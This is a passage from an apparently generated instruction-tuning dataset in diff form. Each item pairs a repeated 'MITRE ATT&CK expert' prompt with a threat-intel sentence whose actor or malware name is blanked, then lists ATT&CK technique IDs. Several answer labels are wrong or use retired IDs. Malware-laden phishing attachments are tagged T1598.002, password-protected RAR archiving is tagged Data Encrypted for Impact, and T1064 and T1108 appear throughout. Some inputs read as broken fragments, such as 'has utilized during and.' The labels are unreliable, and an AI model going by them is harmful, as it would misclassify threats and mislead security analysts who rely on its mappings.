of technique IDs with their names.", + "input": "has distributed targeted emails containing Word documents with embedded malicious macros.", + "output": "- T1598.002: Phishing for Information - Spearphishing Attachment" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "has established persistence by creating autostart extensibility point (ASEP) Registry entries in the Run key and other Registry keys, as well as by creating shortcuts in the Internet Explorer Quick Start folder.", + "output": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "has exfiltrated data in HTTP POST headers.", + "output": "- T1071: Application Layer Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "has exploited the CVE-2016-0167 local vulnerability.", + "output": "- T1068: Exploitation for Privilege Escalation" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "has functionality to copy itself to network shares.", + "output": "- T1080: Taint Shared Content" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "has interacted with compromised systems to browse and copy files through its graphical user interface in sessions.", + "output": "- T1061: Graphical User Interface" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "has obfuscated DLLs and functions using dummy API calls inserted between real instructions.", + "output": "- T1027.001: Obfuscated Files or Information - Binary Padding" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "has registered a Windows shell script under the Registry key HKCU\\Environment\\UserInitMprLogonScript to establish persistence.", + "output": "- T1037: Boot or Logon Initialization Scripts" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "has sent malicious Office documents via email as part of spearphishing campaigns as well as executables disguised as documents.", + "output": "- T1598.002: Phishing for Information - Spearphishing Attachment" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "has sent spearphishing emails with malicious attachments, including .rtf, .doc, and .xls files.", + "output": "- T1598.002: Phishing for Information - Spearphishing Attachment" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "has sent spearphishing emails with various attachment types to corporate and personal email accounts of victim organizations. Attachment types have included .rtf, .doc, .xls, archives containing LNK files, and password protected archives containing .exe and .scr executables.", + "output": "- T1598.002: Phishing for Information - Spearphishing Attachment" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "has targeted victims using spearphishing emails with malicious Microsoft Word attachments.", + "output": "- T1598.002: Phishing for Information - Spearphishing Attachment" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "has targeted victims with spearphishing emails containing malicious Microsoft Word documents.", + "output": "- T1598.002: Phishing for Information - Spearphishing Attachment" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "has the ability to initiate keylogging and screen captures.", + "output": "- T1113: Screen Capture" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "has used a Metasploit PowerShell module to download and execute shellcode and to set up a local listener. has also used scripting to iterate through a list of compromised PoS systems, copy data to a log file, and remove the original data files.", + "output": "- T1064: Scripting" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "has used a Registry Run key to establish persistence by executing JavaScript code within the rundll32.exe process.", + "output": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "has used a tool known as RemoteExec (similar to ) to remotely execute batch scripts and binaries.", + "output": "- T1569.002: System Services - Service Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "has used a tool that can obtain info about local and global group users, power users, and administrators.", + "output": "- T1087: Account Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "has used CVE-2015-4902 to bypass security features.", + "output": "- T1211: Exploitation for Defense Evasion" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "has used encoded PowerShell scripts uploaded to installations to download and install , as well as to evade defenses.", + "output": "- T1064: Scripting" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "has used JavaScript that communicates over HTTP or HTTPS to attacker controlled domains to download additional frameworks.", + "output": "- T1071: Application Layer Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "has used legitimate VPN, RDP, Citrix, or VNC credentials to maintain access to a victim environment.", + "output": "- T1133: External Remote Services\n- T1078: Valid Accounts" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "has used macros in Word documents that would download a second stage if executed.", + "output": "- T1064: Scripting" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "has used malicious macros embedded inside Office documents to execute files.", + "output": "- T1064: Scripting" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "has used net use to conduct internal discovery of systems. The group has also used quser.exe to identify existing RDP sessions on a victim.", + "output": "- T1049: System Network Connections Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "has used network scanning and enumeration tools, including .", + "output": "- T1018: Remote System Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "has used PowerShell on victim systems to download and run payloads after exploitation.", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell\n- T1064: Scripting" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "has used PowerShell scripts to download and execute programs in memory, without writing to disk.", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell\n- T1064: Scripting" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "has used Putty Secure Copy Client (PSCP) to transfer data.", + "output": "- T1021: Remote Services" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "has used Putty to access compromised systems.", + "output": "- T1021: Remote Services" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "has used RAR to stage and compress local folders.", + "output": "- T1560: Archive Collected Data" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "has used the open source tool Essential NetTools to map the network and build a list of targets.", + "output": "- T1018: Remote System Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "has used via Web shell to establish redundant access. The group has also used harvested credentials to gain access to Internet-accessible resources such as Outlook Web Access, which could be used for redundant access.", + "output": "- T1108: Redundant Access" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "has utilized during and.", + "output": "- T1078: Valid Accounts" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "hides collected data in password-protected .rar archives.", + "output": "- T1560: Archive Collected Data\n- T1486: Data Encrypted for Impact" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "hides from defenders by hooking libc function calls, hiding artifacts that would reveal its presence, such as the user account it creates to provide access and undermining strace, a tool often used to identify malware.", + "output": "- T1014: Rootkit" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "If an initial connectivity check fails, attempts to extract proxy details and credentials from Windows Protected Storage and from the IE Credentials Store. This allows the adversary to use the proxy credentials for subsequent requests if they enable outbound HTTP access.", + "output": "- T1552.001: Unsecured Credentials - Credentials In Files" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "If installing itself as a service fails, instead writes itself as a file named svchost.exe saved in %APPDATA%\\Microsoft\\Network.", + "output": "- T1036: Masquerading" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "infected victims using JavaScript code.", + "output": "- T1064: Scripting" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"installed its payload in the startup programs folder as \"\"Baidu Software Update.\"\" The group also adds its second stage payload to the startup programs as \u201cNet Monitor.\"\"\"", + "output": "- T1036: Masquerading" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "installs a service pointing to a malicious DLL dropped to disk.", + "output": "- T1543.003: Create or Modify System Process - Windows Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "installs itself as a new service.", + "output": "- T1543.003: Create or Modify System Process - Windows Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "is a RAT that communicates with HTTP.", + "output": "- T1043: Commonly Used Port" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "is a UEFI BIOS rootkit developed by the company Hacking Team to persist remote access software on some targeted systems.", + "output": "- T1542.001: Pre-OS Boot - System Firmware\n- T1014: Rootkit" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "is capable of accessing locally stored passwords on victims.", + "output": "- T1552.001: Unsecured Credentials - Credentials In Files" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "is capable of deleting Registry keys used for persistence.", + "output": "- T1070: Indicator Removal" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "is capable of using its command and control protocol over port 443. However, Duqu is also capable of encapsulating its command protocol over standard application layer protocols. The Duqu command and control protocol implements many of the same features as TCP and is a reliable transport protocol.", + "output": "- T1095: Non-Application Layer Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "is initially packed.", + "output": "- T1027.002: Obfuscated Files or Information - Software Packing" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "is known to use RAR with passwords to encrypt data prior to exfiltration.", + "output": "- T1486: Data Encrypted for Impact" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "is sometimes signed with an invalid Authenticode certificate in an apparent effort to make it look more legitimate.", + "output": "- T1553.002: Subvert Trust Controls - Code Signing" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "is used to patch an enterprise domain controller authentication process with a backdoor password. It allows adversaries to bypass the standard authentication system to use a defined password for all accounts authenticating to that domain controller.", + "output": "- T1098: Account Manipulation" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "kills and disables services by using cmd.exe.", + "output": "- T1059: Command and Scripting Interpreter" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "leveraged several compromised universities as proxies to obscure its origin.", + "output": "- T1090: Proxy" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a 